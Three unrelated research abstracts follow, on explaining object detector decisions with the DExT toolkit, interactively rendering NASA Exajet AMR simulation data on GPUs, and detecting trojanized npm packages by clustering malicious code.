Previous work fails to explain as well as evaluate both bounding box and classification decisions individually for various detectors. Moreover, no tools explain each detector decision, evaluate the explanations, and also identify the reasons for detector failures. This restricts the flexibility to analyze detectors. The main contribution presented here is an open-source Detector Explanation Toolkit (DExT). It is used to explain the detector decisions, evaluate the explanations, and analyze detector errors. The detector decisions are explained visually by highlighting the image pixels that most influence a particular decision. The toolkit implements the proposed approach to generate a holistic explanation for all detector decisions using certain gradient-based explanation methods. To the author’s knowledge, this is the first work to conduct extensive qualitative and novel quantitative evaluations of different explanation methods across various detectors. The qualitative evaluation incorporates a visual analysis of the explanations carried out by the author as well as a human-centric evaluation. The human-centric evaluation includes a user study to understand user trust in the explanations generated across various explanation methods for different detectors. Four multi-object visualization methods are provided to merge the explanations of multiple objects detected in an image as well as the corresponding detector outputs in a single image. Finally, DExT implements the procedure to analyze detector failures using the formulated approach.
The visual analysis illustrates that the ability to explain a model is more dependent on the model itself than the actual ability of the explanation method. In addition, the explanations are affected by the object explained, the decision explained, detector architecture, training data labels, and model parameters. The results of the quantitative evaluation show that the Single Shot MultiBox Detector (SSD) is more faithfully explained compared to other detectors regardless of the explanation methods. In addition, a single explanation method cannot generate more faithful explanations than other methods for both the bounding box and the classification decision across different detectors. Both the quantitative and human-centric evaluations identify that SmoothGrad with Guided Backpropagation (GBP) provides more trustworthy explanations among selected methods across all detectors. Finally, a convex polygon-based multi-object visualization method provides more human-understandable visualization than other methods.
The author expects that DExT will motivate practitioners to evaluate object detectors from the interpretability perspective by explaining both bounding box and classification decisions.
We describe a systematic approach for rendering time-varying simulation data produced by exa-scale simulations, using GPU workstations. The data sets we focus on use adaptive mesh refinement (AMR) to overcome memory bandwidth limitations by representing interesting regions in space with high detail. Particularly, our focus is on data sets where the AMR hierarchy is fixed and does not change over time. Our study is motivated by the NASA Exajet, a large computational fluid dynamics simulation of a civilian cargo aircraft that consists of 423 simulation time steps, each storing 2.5 GB of data per scalar field, amounting to a total of 4 TB. We present strategies for rendering this time series data set with smooth animation and at interactive rates using current generation GPUs. We start with an unoptimized baseline and step by step extend that to support fast streaming updates. Our approach demonstrates how to push current visualization workstations and modern visualization APIs to their limits to achieve interactive visualization of exa-scale time series data sets.
Trojanized software packages used in software supply chain attacks constitute an emerging threat. Unfortunately, there is still a lack of scalable approaches that allow automated and timely detection of malicious software packages and thus most detections are based on manual labor and expertise. However, it has been observed that most attack campaigns comprise multiple packages that share the same or similar malicious code. We leverage that fact to automatically reproduce manually identified clusters of known malicious packages that have been used in real world attacks, thus, reducing the need for expert knowledge and manual inspection. Our approach, AST Clustering using MCL to mimic Expertise (ACME), yields promising results with a 𝐹1 score of 0.99. Signatures are automatically generated based on characteristic code fragments from clusters and are subsequently used to scan the whole npm registry for unreported malicious packages. We are able to identify and report six malicious packages that have been removed from npm consequentially. Therefore, our approach can support the detection by reducing manual labor and hence may be employed by maintainers of package repositories to detect possible software supply chain attacks through trojanized software packages.